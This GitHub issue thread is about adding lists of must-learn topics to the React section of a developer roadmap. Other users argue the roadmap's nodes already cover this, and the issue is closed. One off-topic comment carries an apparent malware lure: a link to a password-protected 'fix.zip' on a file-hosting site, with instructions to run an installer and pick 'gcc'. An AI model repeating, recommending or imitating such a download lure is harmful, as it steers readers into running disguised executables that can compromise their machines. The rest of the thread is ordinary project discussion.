### ISSUE TITLE
Topic of specific Tech in Roadmap 

### ISSUE THREAD

**Issue by zrrehan** [kamranahmedse/developer-roadmap#6854]
### Feature Description

![image](https://github.com/user-attachments/assets/afcb5773-69b7-40b8-b30e-c0491162981d)

In a specific tech like React, you just wrote what it is and where I should learn it. Besides that, if you could also write down the minimum topics I should learn, it would be very helpful.

as example you could add

```
IN react must learned topics are ... 
1. Compoent, 
2. hook (useState, useEffect, useRef, useContext) 
3. conditional rendering 
4. ... 
5. ..
6. ..
7. ..
8. ..
```

something like that. Thank you so much. Besides of that the roadmap is so helpful

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kenshanta** [comment]
Wouldn't that beat the purpose of the roadmap? There are branched nodes for all the core concepts of react that each have it's set of description; including the examples you mentioned

**Comment by offensive-vk** [comment]
> Wouldn't that beat the purpose of the roadmap? There are branched nodes for all the core concepts of react that each have it's set of description; including the examples you mentioned

bro has a point.

https://github.com/user-attachments/assets/d28ee1e4-8541-4ee9-83f3-5a5a71e19d7b

**Comment by dansholds** [comment]
Closing due to the comments clearly advocating against this
